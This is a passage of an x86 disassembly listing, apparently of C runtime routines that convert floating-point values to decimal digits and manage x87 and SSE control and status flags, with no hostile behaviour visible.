or edx, esi
dec [ebp+var_44]
mov [ebp+var_C], edi
mov [ebp+var_10], edx
jnz short loc_412E40
cmp [ebp+var_48], 0
jz short loc_412E7C
or word ptr [ebp+var_10], 1
loc_412E7C: ; CODE XREF: sub_412AB1+377�j
; sub_412AB1+381�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_412E95
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_412EC8
loc_412E95: ; CODE XREF: sub_412AB1+3D1�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_412EC5
and [ebp+var_10+2], 0
cmp [ebp+var_C+2], 0FFFFFFFFh
jnz short loc_412EC0
and [ebp+var_C+2], 0
cmp word ptr [ebp+var_8+2], 0FFFFh
jnz short loc_412EBA
mov word ptr [ebp+var_8+2], 8000h
inc eax
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EBA: ; CODE XREF: sub_412AB1+3FE�j
inc word ptr [ebp+var_8+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC0: ; CODE XREF: sub_412AB1+3F2�j
inc [ebp+var_C+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC5: ; CODE XREF: sub_412AB1+3E8�j
inc [ebp+var_10+2]
loc_412EC8: ; CODE XREF: sub_412AB1+3E2�j
; sub_412AB1+407�j ...
cmp ax, 7FFFh
jnb short loc_412EEA
mov dx, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], dx
mov edx, [ebp+var_C]
mov [ebp+var_20+2], edx
mov edx, [ebp+var_8]
or eax, ecx
mov [ebp+var_1A], edx
mov word ptr [ebp+var_16], ax
jmp short loc_412F06
; ---------------------------------------------------------------------------
loc_412EEA: ; CODE XREF: sub_412AB1+230�j
; sub_412AB1+239�j ...
neg cx
sbb ecx, ecx
and dword ptr [ebp-1Ch], 0
and ecx, 80000000h
add ecx, 7FFF8000h
and [ebp+var_20], 0
mov [ebp+var_1A+2], ecx
loc_412F06: ; CODE XREF: sub_412AB1+1D6�j
; sub_412AB1+25A�j ...
test ebx, ebx
jnz loc_412C79
xor eax, eax
loc_412F10: ; CODE XREF: sub_412AB1+1AB�j
; sub_412AB1+1C2�j
mov ecx, [ebp+var_1A+2]
shr ecx, 10h
cmp cx, 3FFFh
mov ebx, 7FFFh
jb loc_413170
mov esi, [ebp+var_28+2]
inc [ebp+var_4C]
movzx edx, cx
mov ecx, esi
xor ecx, edx
and edx, ebx
and esi, ebx
and ecx, 8000h
cmp dx, bx
lea edi, [esi+edx]
mov [ebp+var_58], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
movzx edi, di
jnb loc_413156
cmp si, bx
jnb loc_413156
cmp di, 0BFFDh
ja loc_413156
cmp di, 3FBFh
ja short loc_412F7B
loc_412F73: ; CODE XREF: sub_412AB1+503�j
mov [ebp+var_1A+2], eax
jmp loc_41316A
; ---------------------------------------------------------------------------
loc_412F7B: ; CODE XREF: sub_412AB1+4C0�j
cmp dx, ax
jnz short loc_412F9D
inc edi
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412F9D
cmp [ebp-1Ch], eax
jnz short loc_412F9D
cmp [ebp+var_20], eax
jnz short loc_412F9D
mov word ptr [ebp+var_16], ax
jmp loc_413170
; ---------------------------------------------------------------------------
loc_412F9D: ; CODE XREF: sub_412AB1+4CD�j
; sub_412AB1+4D7�j ...
cmp si, ax
jnz short loc_412FB6
inc edi
test [ebp+var_28], 7FFFFFFFh
jnz short loc_412FB6
cmp [ebp+var_2C], eax
jnz short loc_412FB6
cmp [ebp+var_30], eax
jz short loc_412F73
loc_412FB6: ; CODE XREF: sub_412AB1+4EF�j
; sub_412AB1+4F9�j ...
and [ebp+var_54], 0
lea eax, [ebp+var_C]
mov [ebp+var_40], 5
loc_412FC4: ; CODE XREF: sub_412AB1+580�j
mov edx, [ebp+var_54]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_413025
lea esi, [ebp+var_28]
lea edx, [ebp+edx+var_20]
mov [ebp+var_5C], esi
mov [ebp+var_48], edx
loc_412FE0: ; CODE XREF: sub_412AB1+572�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_48]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
and [ebp+var_44], 0
imul edx, esi
mov esi, [eax-4]
lea ebx, [esi+edx]
cmp ebx, esi
jb short loc_413001
cmp ebx, edx
jnb short loc_413008
loc_413001: ; CODE XREF: sub_412AB1+54A�j
mov [ebp+var_44], 1
loc_413008: ; CODE XREF: sub_412AB1+54E�j
cmp [ebp+var_44], 0
mov [eax-4], ebx
jz short loc_413014
inc word ptr [eax]
loc_413014: ; CODE XREF: sub_412AB1+55E�j
add [ebp+var_48], 2
sub [ebp+var_5C], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412FE0
loc_413025: ; CODE XREF: sub_412AB1+520�j
inc eax
inc eax
inc [ebp+var_54]
dec [ebp+var_40]
cmp [ebp+var_40], 0
jg short loc_412FC4
add edi, 0C002h
xor eax, eax
cmp di, ax
jle short loc_41307C
loc_413040: ; CODE XREF: sub_412AB1+5C4�j
test [ebp+var_8], 80000000h
jnz short loc_413077
mov edx, [ebp+var_10]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add ebx, ebx
or ebx, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add edi, 0FFFFh
cmp di, ax
mov [ebp+var_C], ebx
mov [ebp+var_8], edx
jg short loc_413040
loc_413077: ; CODE XREF: sub_412AB1+596�j
cmp di, ax
jg short loc_4130CB
loc_41307C: ; CODE XREF: sub_412AB1+58D�j
add edi, 0FFFFh
cmp di, ax
jge short loc_4130CB
mov eax, edi
neg eax
movzx eax, ax
add edi, eax
loc_413090: ; CODE XREF: sub_412AB1+60C�j
test byte ptr [ebp+var_10], 1
jz short loc_413099
inc [ebp+var_58]
loc_413099: ; CODE XREF: sub_412AB1+5E3�j
mov edx, [ebp+var_8]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr ebx, 1
or ebx, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec eax
mov [ebp+var_C], ebx
mov [ebp+var_10], edx
jnz short loc_413090
xor eax, eax
cmp [ebp+var_58], eax
jz short loc_4130CB
or word ptr [ebp+var_10], 1
loc_4130CB: ; CODE XREF: sub_412AB1+5C9�j
; sub_412AB1+5D4�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_4130E4
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_413115
loc_4130E4: ; CODE XREF: sub_412AB1+620�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_413112
cmp [ebp+var_C+2], 0FFFFFFFFh
mov [ebp+var_10+2], eax
jnz short loc_41310D
cmp word ptr [ebp+var_8+2], 0FFFFh
mov [ebp+var_C+2], eax
jnz short loc_413107
mov word ptr [ebp+var_8+2], 8000h
inc edi
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413107: ; CODE XREF: sub_412AB1+64B�j
inc word ptr [ebp+var_8+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_41310D: ; CODE XREF: sub_412AB1+640�j
inc [ebp+var_C+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413112: ; CODE XREF: sub_412AB1+637�j
inc [ebp+var_10+2]
loc_413115: ; CODE XREF: sub_412AB1+631�j
; sub_412AB1+654�j ...
cmp di, 7FFFh
jb short loc_41313A
neg cx
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_413136: ; CODE XREF: sub_412AB1+6A3�j
xor eax, eax
jmp short loc_413170
; ---------------------------------------------------------------------------
loc_41313A: ; CODE XREF: sub_412AB1+669�j
mov ax, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], ax
mov eax, [ebp+var_C]
mov [ebp+var_20+2], eax
mov eax, [ebp+var_8]
or edi, ecx
mov [ebp+var_1A], eax
mov word ptr [ebp+var_16], di
jmp short loc_413136
; ---------------------------------------------------------------------------
loc_413156: ; CODE XREF: sub_412AB1+4A1�j
; sub_412AB1+4AA�j ...
neg cx
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_41316A: ; CODE XREF: sub_412AB1+4C5�j
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
loc_413170: ; CODE XREF: sub_412AB1+46F�j
; sub_412AB1+4E7�j ...
test [ebp+arg_10], 1
mov edx, [ebp+var_60]
mov ecx, [ebp+var_4C]
mov [edx], cx
jz short loc_4131B1
movsx ecx, cx
add [ebp+arg_C], ecx
cmp [ebp+arg_C], eax
jg short loc_4131B1
and word ptr [edx], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [edx+3], 1
setnz al
dec al
and al, 0Dh
add al, 20h
mov [edx+2], al
mov byte ptr [edx+4], 30h
mov byte ptr [edx+5], 0
jmp loc_412B60
; ---------------------------------------------------------------------------
loc_4131B1: ; CODE XREF: sub_412AB1+6CC�j
; sub_412AB1+6D7�j
push 15h
pop ecx
cmp [ebp+arg_C], ecx
jle short loc_4131BC
mov [ebp+arg_C], ecx
loc_4131BC: ; CODE XREF: sub_412AB1+706�j
mov esi, [ebp+var_1A+2]
shr esi, 10h
push 8
sub esi, 3FFEh
mov word ptr [ebp+var_16], ax
pop ebx
loc_4131CF: ; CODE XREF: sub_412AB1+742�j
mov eax, [ebp+var_20]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shl [ebp+var_20], 1
shr eax, 1Fh
add edi, edi
or edi, eax
mov eax, [ebp+var_1A+2]
shr ecx, 1Fh
add eax, eax
or eax, ecx
dec ebx
mov [ebp-1Ch], edi
mov [ebp+var_1A+2], eax
jnz short loc_4131CF
test esi, esi
jge short loc_41322B
neg esi
and esi, 0FFh
jle short loc_41322B
loc_413203: ; CODE XREF: sub_412AB1+778�j
mov eax, [ebp+var_1A+2]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shr [ebp+var_1A+2], 1
shl eax, 1Fh
shr edi, 1
or edi, eax
mov eax, [ebp+var_20]
shl ecx, 1Fh
shr eax, 1
or eax, ecx
dec esi
test esi, esi
mov [ebp-1Ch], edi
mov [ebp+var_20], eax
jg short loc_413203
loc_41322B: ; CODE XREF: sub_412AB1+746�j
; sub_412AB1+750�j
mov eax, [ebp+arg_C]
inc eax
test eax, eax
lea ebx, [edx+4]
mov [ebp+var_40], ebx
mov [ebp+var_4C], eax
jle loc_4132F5
loc_413240: ; CODE XREF: sub_412AB1+83E�j
mov edx, [ebp+var_20]
mov eax, [ebp-1Ch]
lea esi, [ebp+var_20]
lea edi, [ebp+var_3C]
movsd
movsd
movsd
shl [ebp+var_20], 1
mov edi, [ebp+var_20]
shl [ebp+var_20], 1
shr edx, 1Fh
lea ecx, [eax+eax]
or ecx, edx
mov edx, [ebp+var_1A+2]
mov esi, eax
shr esi, 1Fh
add edx, edx
or edx, esi
mov eax, ecx
lea esi, [ecx+ecx]
shr eax, 1Fh
lea ecx, [edx+edx]
mov edx, [ebp+var_3C]
shr edi, 1Fh
or ecx, eax
mov eax, [ebp+var_20]
or esi, edi
lea edi, [edx+eax]
cmp edi, eax
jb short loc_41328F
cmp edi, edx
jnb short loc_4132A7
loc_41328F: ; CODE XREF: sub_412AB1+7D8�j
lea eax, [esi+1]
xor edx, edx
cmp eax, esi
jb short loc_41329D
cmp eax, 1
jnb short loc_4132A0
loc_41329D: ; CODE XREF: sub_412AB1+7E5�j
xor edx, edx
inc edx
loc_4132A0: ; CODE XREF: sub_412AB1+7EA�j
test edx, edx
mov esi, eax
jz short loc_4132A7
inc ecx
loc_4132A7: ; CODE XREF: sub_412AB1+7DC�j
; sub_412AB1+7F3�j
mov eax, [ebp+var_38]
lea edx, [eax+esi]
cmp edx, esi
mov [ebp+var_44], edx
jb short loc_4132B8
cmp edx, eax
jnb short loc_4132B9
loc_4132B8: ; CODE XREF: sub_412AB1+801�j
inc ecx
loc_4132B9: ; CODE XREF: sub_412AB1+805�j
add ecx, [ebp+var_34]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
lea esi, [edi+edi]
mov [ebp+var_20], esi
mov esi, [ebp+var_44]
mov [ebp+var_1A+2], ecx
shr ecx, 18h
add esi, esi
add cl, 30h
mov eax, edi
shr eax, 1Fh
or esi, eax
mov [ebx], cl
inc ebx
dec [ebp+var_4C]
cmp [ebp+var_4C], 0
mov [ebp-1Ch], esi
mov byte ptr [ebp+var_16+1], 0
jg loc_413240
loc_4132F5: ; CODE XREF: sub_412AB1+789�j
dec ebx
mov al, [ebx]
dec ebx
cmp al, 35h
jge short loc_41330B
mov ecx, [ebp+var_40]
jmp short loc_413346
; ---------------------------------------------------------------------------
loc_413302: ; CODE XREF: sub_412AB1+85D�j
cmp byte ptr [ebx], 39h
jnz short loc_413310
mov byte ptr [ebx], 30h
dec ebx
loc_41330B: ; CODE XREF: sub_412AB1+84A�j
cmp ebx, [ebp+var_40]
jnb short loc_413302
loc_413310: ; CODE XREF: sub_412AB1+854�j
cmp ebx, [ebp+var_40]
mov eax, [ebp+var_60]
jnb short loc_41331C
inc ebx
inc word ptr [eax]
loc_41331C: ; CODE XREF: sub_412AB1+865�j
inc byte ptr [ebx]
loc_41331E: ; CODE XREF: sub_412AB1+89E�j
sub bl, al
sub bl, 3
movsx ecx, bl
mov [eax+3], bl
mov byte ptr [ecx+eax+4], 0
mov eax, [ebp+var_74]
loc_413331: ; CODE XREF: sub_412AB1+B2�j
; sub_412AB1+15B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_413340: ; CODE XREF: sub_412AB1+897�j
cmp byte ptr [ebx], 30h
jnz short loc_41334A
dec ebx
loc_413346: ; CODE XREF: sub_412AB1+84F�j
cmp ebx, ecx
jnb short loc_413340
loc_41334A: ; CODE XREF: sub_412AB1+892�j
cmp ebx, ecx
mov eax, [ebp+var_60]
jnb short loc_41331E
and word ptr [eax], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [eax+3], 1
setnz dl
dec dl
and dl, 0Dh
add dl, 20h
mov [eax+2], dl
mov byte ptr [ecx], 30h
mov byte ptr [eax+5], 0
jmp loc_412B60
sub_412AB1 endp
; =============== S U B R O U T I N E =======================================
sub_413379 proc near ; CODE XREF: sub_4134A7+C0�p
xor eax, eax
test bl, 10h
jz short loc_413381
inc eax
loc_413381: ; CODE XREF: sub_413379+5�j
test bl, 8
jz short loc_413389
or eax, 4
loc_413389: ; CODE XREF: sub_413379+B�j
test bl, 4
jz short loc_413391
or eax, 8
loc_413391: ; CODE XREF: sub_413379+13�j
test bl, 2
jz short loc_413399
or eax, 10h
loc_413399: ; CODE XREF: sub_413379+1B�j
test bl, 1
jz short loc_4133A1
or eax, 20h
loc_4133A1: ; CODE XREF: sub_413379+23�j
test ebx, 80000h
jz short loc_4133AC
or eax, 2
loc_4133AC: ; CODE XREF: sub_413379+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_4133E0
cmp ecx, 100h
jz short loc_4133DB
cmp ecx, esi
jz short loc_4133D4
cmp ecx, edx
jnz short loc_4133E0
or eax, 0C00h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133D4: ; CODE XREF: sub_413379+4E�j
or eax, 800h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133DB: ; CODE XREF: sub_413379+4A�j
or eax, 400h
loc_4133E0: ; CODE XREF: sub_413379+42�j
; sub_413379+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_4133F6
cmp ecx, 10000h
jnz short loc_4133F8
or eax, esi
jmp short loc_4133F8
; ---------------------------------------------------------------------------
loc_4133F6: ; CODE XREF: sub_413379+6F�j
or eax, edx
loc_4133F8: ; CODE XREF: sub_413379+77�j
; sub_413379+7B�j
test ebx, 40000h
pop esi
jz short locret_413406
or eax, 1000h
locret_413406: ; CODE XREF: sub_413379+86�j
retn
sub_413379 endp
; =============== S U B R O U T I N E =======================================
sub_413407 proc near ; CODE XREF: sub_4134A7:loc_4136E0�p
xor eax, eax
test dl, 10h
jz short loc_413413
mov eax, 80h
loc_413413: ; CODE XREF: sub_413407+5�j
test dl, 8
push ebx
push esi
push edi
mov ebx, 200h
jz short loc_413422
or eax, ebx
loc_413422: ; CODE XREF: sub_413407+17�j
test dl, 4
jz short loc_41342C
or eax, 400h
loc_41342C: ; CODE XREF: sub_413407+1E�j
test dl, 2
jz short loc_413436
or eax, 800h
loc_413436: ; CODE XREF: sub_413407+28�j
test dl, 1
jz short loc_413440
or eax, 1000h
loc_413440: ; CODE XREF: sub_413407+32�j
test edx, 80000h
mov edi, 100h
jz short loc_41344F
or eax, edi
loc_41344F: ; CODE XREF: sub_413407+44�j
mov ecx, edx
mov esi, 300h
and ecx, esi
jz short loc_413479
cmp ecx, edi
jz short loc_413474
cmp ecx, ebx
jz short loc_41346D
cmp ecx, esi
jnz short loc_413479
or eax, 6000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_41346D: ; CODE XREF: sub_413407+59�j
or eax, 4000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_413474: ; CODE XREF: sub_413407+55�j
or eax, 2000h
loc_413479: ; CODE XREF: sub_413407+51�j
; sub_413407+5D�j ...
mov ecx, 3000000h
pop edi
and edx, ecx
cmp edx, 1000000h
pop esi
pop ebx
jz short loc_4134A1
cmp edx, 2000000h
jz short loc_41349D
cmp edx, ecx
jnz short locret_4134A6
or eax, 8000h
retn
; ---------------------------------------------------------------------------
loc_41349D: ; CODE XREF: sub_413407+8A�j
or eax, 40h
retn
; ---------------------------------------------------------------------------
loc_4134A1: ; CODE XREF: sub_413407+82�j
or eax, 8040h
locret_4134A6: ; CODE XREF: sub_413407+8E�j
retn
sub_413407 endp
; =============== S U B R O U T I N E =======================================
sub_4134A7 proc near ; CODE XREF: sub_4118FF+25�p
; sub_4118FF+55�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10h
push ebx
push ebp
push esi
push edi
fstcw word ptr [esp+20h+var_C]
mov ebx, [esp+20h+var_C]
xor edx, edx
test bl, 1
jz short loc_4134C1
push 10h
pop edx
loc_4134C1: ; CODE XREF: sub_4134A7+15�j
test bl, 4
jz short loc_4134C9
or edx, 8
loc_4134C9: ; CODE XREF: sub_4134A7+1D�j
test bl, 8
jz short loc_4134D1
or edx, 4
loc_4134D1: ; CODE XREF: sub_4134A7+25�j
test bl, 10h
jz short loc_4134D9
or edx, 2
loc_4134D9: ; CODE XREF: sub_4134A7+2D�j
test bl, 20h
jz short loc_4134E1
or edx, 1
loc_4134E1: ; CODE XREF: sub_4134A7+35�j
test bl, 2
jz short loc_4134EC
or edx, 80000h
loc_4134EC: ; CODE XREF: sub_4134A7+3D�j
movzx ecx, bx
mov eax, ecx
mov edi, 0C00h
and eax, edi
mov ebp, 300h
mov esi, 200h
jz short loc_413524
cmp eax, 400h
jz short loc_41351E
cmp eax, 800h
jz short loc_41351A
cmp eax, edi
jnz short loc_413524
or edx, ebp
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351A: ; CODE XREF: sub_4134A7+69�j
or edx, esi
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351E: ; CODE XREF: sub_4134A7+62�j
or edx, 100h
loc_413524: ; CODE XREF: sub_4134A7+5B�j
; sub_4134A7+6D�j ...
and ecx, ebp
jz short loc_413534
cmp ecx, esi
jnz short loc_41353A
or edx, 10000h
jmp short loc_41353A
; ---------------------------------------------------------------------------
loc_413534: ; CODE XREF: sub_4134A7+7F�j
or edx, 20000h
loc_41353A: ; CODE XREF: sub_4134A7+83�j
; sub_4134A7+8B�j
test bx, 1000h
jz short loc_413547
or edx, 40000h
loc_413547: ; CODE XREF: sub_4134A7+98�j
mov esi, [esp+20h+arg_4]
mov ecx, [esp+20h+arg_0]
mov eax, esi
not eax
and eax, edx
and ecx, esi
or eax, ecx
cmp eax, edx
mov [esp+20h+var_4], eax
jz loc_41360F
mov ebx, eax
call sub_413379
movzx eax, ax
mov [esp+20h+var_10], eax
fldcw word ptr [esp+20h+var_10]
fstcw word ptr [esp+20h+var_10]
mov ebx, [esp+20h+var_10]
xor edx, edx
test bl, 1
jz short loc_41358A
push 10h
pop edx
loc_41358A: ; CODE XREF: sub_4134A7+DE�j
test bl, 4
jz short loc_413592
or edx, 8
loc_413592: ; CODE XREF: sub_4134A7+E6�j
test bl, 8
jz short loc_41359A
or edx, 4
loc_41359A: ; CODE XREF: sub_4134A7+EE�j
test bl, 10h
jz short loc_4135A2
or edx, 2
loc_4135A2: ; CODE XREF: sub_4134A7+F6�j
test bl, 20h
jz short loc_4135AA
or edx, 1
loc_4135AA: ; CODE XREF: sub_4134A7+FE�j
test bl, 2
jz short loc_4135B5
or edx, 80000h
loc_4135B5: ; CODE XREF: sub_4134A7+106�j
movzx ecx, bx
mov eax, ecx
and eax, edi
jz short loc_4135E2
cmp eax, 400h
jz short loc_4135DC
cmp eax, 800h
jz short loc_4135D4
cmp eax, edi
jnz short loc_4135E2
or edx, ebp
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135D4: ; CODE XREF: sub_4134A7+123�j
or edx, 200h
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135DC: ; CODE XREF: sub_4134A7+11C�j
or edx, 100h
loc_4135E2: ; CODE XREF: sub_4134A7+115�j
; sub_4134A7+127�j ...
and ecx, ebp
jz short loc_4135F6
cmp ecx, 200h
jnz short loc_4135FC
or edx, 10000h
jmp short loc_4135FC
; ---------------------------------------------------------------------------
loc_4135F6: ; CODE XREF: sub_4134A7+13D�j
or edx, 20000h
loc_4135FC: ; CODE XREF: sub_4134A7+145�j
; sub_4134A7+14D�j
test bx, 1000h
jz short loc_413609
or edx, 40000h
loc_413609: ; CODE XREF: sub_4134A7+15A�j
mov eax, edx
mov [esp+20h+var_4], edx
loc_41360F: ; CODE XREF: sub_4134A7+B8�j
cmp ds:dword_433C7C, 0
jz loc_4137A2
and esi, 308031Fh
mov edi, esi
stmxcsr [esp+20h+var_8]
mov eax, [esp+20h+var_8]
xor esi, esi
test al, al
jns short loc_413636
push 10h
pop esi
loc_413636: ; CODE XREF: sub_4134A7+18A�j
test ax, 200h
jz short loc_41363F
or esi, 8
loc_41363F: ; CODE XREF: sub_4134A7+193�j
test ax, 400h
jz short loc_413648
or esi, 4
loc_413648: ; CODE XREF: sub_4134A7+19C�j
test ax, 800h
jz short loc_413651
or esi, 2
loc_413651: ; CODE XREF: sub_4134A7+1A5�j
test ax, 1000h
jz short loc_41365A
or esi, 1
loc_41365A: ; CODE XREF: sub_4134A7+1AE�j
test ax, 100h
jz short loc_413666
or esi, 80000h
loc_413666: ; CODE XREF: sub_4134A7+1B7�j
mov ecx, eax
mov ebp, 6000h
and ecx, ebp
jz short loc_41369B
cmp ecx, 2000h
jz short loc_413695
cmp ecx, 4000h
jz short loc_41368D
cmp ecx, ebp
jnz short loc_41369B
or esi, 300h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_41368D: ; CODE XREF: sub_4134A7+1D8�j
or esi, 200h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_413695: ; CODE XREF: sub_4134A7+1D0�j
or esi, 100h
loc_41369B: ; CODE XREF: sub_4134A7+1C8�j
; sub_4134A7+1DC�j ...
mov ebx, 8040h
and eax, ebx
sub eax, 40h
jz short loc_4136C3
sub eax, 7FC0h
jz short loc_4136BB
sub eax, 40h
jnz short loc_4136C9
or esi, 1000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136BB: ; CODE XREF: sub_4134A7+205�j
or esi, 3000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136C3: ; CODE XREF: sub_4134A7+1FE�j
or esi, 2000000h
loc_4136C9: ; CODE XREF: sub_4134A7+20A�j
; sub_4134A7+212�j ...
mov edx, edi
and edi, [esp+20h+arg_0]
not edx
and edx, esi
or edx, edi
cmp edx, esi
jnz short loc_4136E0
mov eax, esi
jmp loc_41378B
; ---------------------------------------------------------------------------
loc_4136E0: ; CODE XREF: sub_4134A7+230�j
call sub_413407
push eax
mov [esp+24h+arg_4], eax
call sub_4100DA
pop ecx
stmxcsr [esp+20h+arg_4]
mov eax, [esp+20h+arg_4]
xor edx, edx
test al, al
jns short loc_413702
push 10h
pop edx
loc_413702: ; CODE XREF: sub_4134A7+256�j
mov edi, 200h
test eax, edi
jz short loc_41370E
or edx, 8
loc_41370E: ; CODE XREF: sub_4134A7+262�j
test ax, 400h
jz short loc_413717
or edx, 4
loc_413717: ; CODE XREF: sub_4134A7+26B�j
test ax, 800h
jz short loc_413720
or edx, 2
loc_413720: ; CODE XREF: sub_4134A7+274�j
test ax, 1000h
jz short loc_413729
or edx, 1
loc_413729: ; CODE XREF: sub_4134A7+27D�j
mov esi, 100h
test eax, esi
jz short loc_413738
or edx, 80000h
loc_413738: ; CODE XREF: sub_4134A7+289�j
mov ecx, eax
and ecx, ebp
jz short loc_413760
cmp ecx, 2000h
jz short loc_41375E
cmp ecx, 4000h
jz short loc_41375A
cmp ecx, ebp
jnz short loc_413760
or edx, 300h
jmp short loc_413760
; ---------------------------------------------------------------------------
loc_41375A: ; CODE XREF: sub_4134A7+2A5�j
or edx, edi
jmp short loc_413760
; ---------------------------------------------------------------------------
loc_41375E: ; CODE XREF: sub_4134A7+29D�j
or edx, esi
loc_413760: ; CODE XREF: sub_4134A7+295�j
; sub_4134A7+2A9�j ...
and eax, ebx
sub eax, 40h
jz short loc_413783
sub eax, 7FC0h
jz short loc_41377B
sub eax, 40h
jnz short loc_413789
or edx, 1000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_41377B: ; CODE XREF: sub_4134A7+2C5�j
or edx, 3000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_413783: ; CODE XREF: sub_4134A7+2BE�j
or edx, 2000000h
loc_413789: ; CODE XREF: sub_4134A7+2CA�j
; sub_4134A7+2D2�j ...
mov eax, edx
loc_41378B: ; CODE XREF: sub_4134A7+234�j
mov ecx, [esp+20h+var_4]
mov edx, eax
xor edx, ecx
or eax, ecx
test edx, 8031Fh
jz short loc_4137A2
or eax, 80000000h
loc_4137A2: ; CODE XREF: sub_4134A7+16F�j
; sub_4134A7+2F4�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn
sub_4134A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137AA proc near ; CODE XREF: sub_4123ED+326�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push ebx
push esi
xor esi, esi
cmp [ebp+arg_4], esi
push edi
mov [ebp+var_18], 404Eh
mov [eax], esi
mov [eax+4], esi
mov [eax+8], esi
jbe loc_413920
loc_4137DA: ; CODE XREF: sub_4137AA+146�j
mov edx, [eax]
mov ebx, [eax+4]
mov esi, eax
lea edi, [ebp+var_10]
movsd
movsd
movsd
mov ecx, edx
shr ecx, 1Fh
lea edi, [edx+edx]
lea edx, [ebx+ebx]
or edx, ecx
mov ecx, [eax+8]
mov esi, ebx
shr esi, 1Fh
add ecx, ecx
or ecx, esi
mov [ebp+var_14], edi
mov esi, edi
and [ebp+var_14], 0
mov ebx, edx
shr ebx, 1Fh
add ecx, ecx
shr edi, 1Fh
or ecx, ebx
mov ebx, [ebp+var_10]
add esi, esi
add edx, edx
or edx, edi
lea edi, [esi+ebx]
cmp edi, esi
mov [eax], esi
mov [eax+4], edx
mov [eax+8], ecx
jb short loc_413831
cmp edi, ebx
jnb short loc_413838
loc_413831: ; CODE XREF: sub_4137AA+81�j
mov [ebp+var_14], 1
loc_413838: ; CODE XREF: sub_4137AA+85�j
xor ebx, ebx
cmp [ebp+var_14], ebx
mov [eax], edi
jz short loc_41385B
lea esi, [edx+1]
cmp esi, edx
jb short loc_41384D
cmp esi, 1
jnb short loc_413850
loc_41384D: ; CODE XREF: sub_4137AA+9C�j
xor ebx, ebx
inc ebx
loc_413850: ; CODE XREF: sub_4137AA+A1�j
test ebx, ebx
mov [eax+4], esi
jz short loc_41385B
inc ecx
mov [eax+8], ecx
loc_41385B: ; CODE XREF: sub_4137AA+95�j
; sub_4137AA+AB�j
mov ecx, [eax+4]
mov edx, [ebp+var_C]
lea ebx, [ecx+edx]
xor esi, esi
cmp ebx, ecx
jb short loc_41386E
cmp ebx, edx
jnb short loc_413871
loc_41386E: ; CODE XREF: sub_4137AA+BE�j
xor esi, esi
inc esi
loc_413871: ; CODE XREF: sub_4137AA+C2�j
test esi, esi
mov [eax+4], ebx
jz short loc_41387B
inc dword ptr [eax+8]
loc_41387B: ; CODE XREF: sub_4137AA+CC�j
mov ecx, [ebp+var_8]
add [eax+8], ecx
and [ebp+var_14], 0
lea ecx, [edi+edi]
